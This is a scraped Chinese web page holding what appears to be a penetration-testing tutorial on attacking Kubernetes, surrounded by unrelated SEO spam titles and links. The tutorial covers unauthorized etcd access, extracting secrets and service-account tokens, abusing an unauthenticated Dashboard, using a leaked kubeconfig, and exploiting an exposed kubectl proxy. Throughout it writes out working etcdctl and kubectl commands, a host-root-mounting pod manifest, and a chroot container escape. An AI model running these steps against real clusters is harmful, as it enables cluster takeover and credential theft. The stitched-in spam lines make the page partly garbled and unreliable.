当前位置: 首页 > news >正文

网站建设网页设计案例知乎seo排名帝搜软件

网站建设网页设计案例,知乎seo排名帝搜软件,wordpress底部的横线,强生公司营销网站为什么要这样做目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点#xff1a; 1、云原生-K8s安全-etcd未…目录 云原生-K8s安全-etcd(Master-数据库)未授权访问 etcdV2版本利用 etcdV3版本利用 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 云原生-K8s安全-Configfile鉴权文件泄漏 云原生-K8s安全-Kubectl Proxy不安全配置 知识点 1、云原生-K8s安全-etcd未授权访问 2、云原生-K8s安全-Dashboard未授权访问 3、云原生-K8s安全-Configfile鉴权文件泄漏 4、云原生-K8s安全-Kubectl Proxy不安全配置 云原生-K8s安全-etcd(Master-数据库)未授权访问 实战中不会常见利用条件比较苛刻。 默认通过证书认证起一个数据库作用。主要存放节点的数据如一些token和证书。 攻击23791端口 配置映射 /etc/kubernetes/manifests/etcd.yaml第一种(满足)在安装etcd时没有配置指定--client-cert-auth 参数打开证书校验暴露在外Etcd服务存在未授权访问风险。暴露外部可以访问直接未授权访问获取secrets和token利用 重启kubelet进程 systemctl restart kubelet第二种在打开证书校验选项后通过本地127.0.0.1:2379可免认证访问Etcd服务但通过其他地址访问要携带cert(证书)进行认证访问一般配合ssrf或其他利用较为鸡肋。只能本地访问直接未授权访问获取secrets和token利用 第三种(满足)实战中在安装k8s默认的配置2379只会监听本地(127.0.0.1)如果访问没设置0.0.0.0暴露那么也就意味着最多就是本地访问不能公网访问只能配合ssrf或其他。只能本地访问利用ssrf或其他进行获取secrets和token利用 复现搭建 https://www.cnblogs.com/qtzd/p/k8s_etcd.html 复现利用etcdV2/V3版本利用参考 https://www.cnblogs.com/qtzd/p/k8s_etcd.html https://www.wangan.com/p/7fy7f81f02d9563a 暴露etcd未授权-获取secretstoken-通过token访问API-Server接管 etcdV2版本利用 直接访问http://ip:2379/v2/keys/?recursivetrue 可以看到所有的key-value值。secrets token etcdV3版本利用 安装etcdctlhttps://github.com/etcd-io/etcd/releases 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 1、连接提交测试 ./etcdctl --endpoints192.168.139.136:23791 get / --prefix./etcdctl --endpoints192.168.139.136:23791 put /testdir/testkey1 Hello world1./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey2 Hello world2 ./etcdctl -- endpoints192.168.139.136:23791 put /testdir/testkey3 Hello world32、获取k8s的secrets ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/3、读取service account token ./etcdctl --endpoints192.168.139.136:23791 get / --prefix --keys-only | grep /secrets/kube-system/clusterrole./etcdctl --endpoints192.168.139.136:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z4、通过token访问API-Server获取集群的权限 kubectl --insecure-skip-tls-verify -s https://127.0.0.1:6443/ --tokeney... -n kube-system get podsSSRF解决限制访问-获取secretstoken-通过token访问API-Server接管 云原生-K8s安全-Dashboard(Master-web面板)未授权访问 默认端口8001(一般会被映射成别的端口) 配置不当导致dashboard未授权访问,通过dashboard我们可以控制整个集群。 kubernetes dashboard的未授权其实分两种情况 一种是在本身就存在着不需要登录的http接口但接口本身并不会暴露出来如接口被暴露在外就会导致dashboard未授权。另外一种情况则是开发嫌登录麻烦修改了配置文件使得安全接口https的dashboard页面可以跳过登录。 复现利用 前提条件 用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboardKubernetes-dashboard绑定cluster-admin拥有管理集群的最高权限) 1、安装 https://blog.csdn.net/justlpf/article/details/130718774 2、启动 kubectl create -f recommended.yaml 3、卸载 kubectl delete -f recommended.yaml4、查看状态 kubectl get pod,svc -n kubernetes-dashboard5、利用新增Pod后续同前面利用一致 apiVersion: v1 kind: Pod metadata:name: xiaodisec spec:containers:- image: nginxname: xiaodisecvolumeMounts:- mountPath: /mntname: test-volumevolumes:- name: test-volumehostPath:path: /找到暴露面板-dashboard跳过-创建或上传pod-进入pod执行-利用挂载逃逸   云原生-K8s安全-Configfile鉴权文件泄漏 攻击者通过Webshell、Github等拿到了K8s配置的Config文件操作集群从而接管所有容器。 K8s configfile作为K8s集群的管理凭证其中包含有关K8s集群的详细信息(API Server、登录凭证)。 如果攻击者能够访问到此文件(如办公网员工机器入侵、泄露到Github的代码等)就可以直接通过API Server接管K8s集群带来风险隐患。用户凭证保存 在kubeconfig文件中通过以下顺序来找到kubeconfig文件 如果提供了--kubeconfig参数就使用提供的kubeconfig文件如果没有提供--kubeconfig参数但设置了环境变量$KUBECONFIG则使用该环境变量提供的kubeconfig文件如果以上两种情况都没有kubectl就使用默认的kubeconfig文件~/.kube/config 复现利用K8s-configfile-创建Pod/挂载主机路径-Kubectl进入容器-利用挂载逃逸 1、将获取到的config复制 2、安装kubectl使用config连接 安装kubectlhttps://kubernetes.io/zh-cn/docs/tasks/tools/install-kubectl-linux 连接 kubectl -s https://192.168.139.130:6443/ --kubeconfigconfig --insecure-skip-tls-verifytrue get nodes3、上传利用test.yaml创建pod kubectl apply -f test.yaml -n default --kubeconfigconfig4、连接pod后进行容器挂载逃逸 kubectl exec -it xiaodisec bash -n default --kubeconfigconfigcd /mnt chroot . bash云原生-K8s安全-Kubectl Proxy不安全配置 当运维人员需要某个环境暴露端口或者IP时会用到Kubectl Proxy 使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上 环境搭建 kubectl --insecure-skip-tls-verify proxy --accept-hosts^.*$ --address0.0.0.0 --port8009 复现利用类似某个不需认证的服务应用只能本地访问被代理出去后形成了外部攻击入口点。 找到暴露入口点根据类型选择合适方案 kubectl -s http://192.168.139.130:8009 get pods -n kube-system
http://www.pierceye.com/news/688655/

相关文章:

  • 南昌网站建设培训学校做幼儿网站的目标
  • 装饰网站建设的背景怎么做原创动漫视频网站
  • 电脑购物网站模板c2c商城网站建设二次开发
  • 自建站有哪些dz论坛网站源码
  • 湖南湘源建设工程有限公司网站牛商网网站做seo好么
  • 郑州网站制作建设南宁网站设计要多少钱
  • 网站地图制作怎么做云南建设网
  • 网站开发项目经验怎么写网站首页做一点开有动画
  • 乔拓云智能建站系统官网注册公司在哪个网站注册
  • lisp 网站开发什么是网站设计
  • 北京市残疾人网上服务平台网奇seo培训官网
  • 福建省建设环卫协会网站自动的小企业网站建设
  • 深圳关键词seo北京网络优化推广公司
  • 旅游网站建设课程设计报告内部优惠券网站建站
  • 郑州网站优化汉狮网络苏州互联网公司集中在哪里
  • 烟台网站建设精通臻动传媒ui培训设计学校
  • 网站推荐你了解我意思吧深圳响应式设计企业网站
  • 网站后期增加产品东平网页设计
  • 免费网站模板的制作方法石台做网站
  • 温州建设网站公司哪家好游戏外包公司要不要去
  • 动力无限西安网站建设wordpress图片到本地
  • 重庆微信营销网站建设seo快照推广
  • dedecms小说网站模板如何以目录形式访问网站
  • 有哪些可以做网站的平台怎样把录的视频做一下传到网站
  • 网站域名如何续费福建建筑人才服务中心
  • 站长平台怎么添加网站网站中文名注册
  • 唐四薪php网站开发答案想制作一个网站要多少钱
  • ppt网站建设答案东台网页定制
  • 做网站 侵权如何制作手机版网站
  • 代发网站建设app网站软件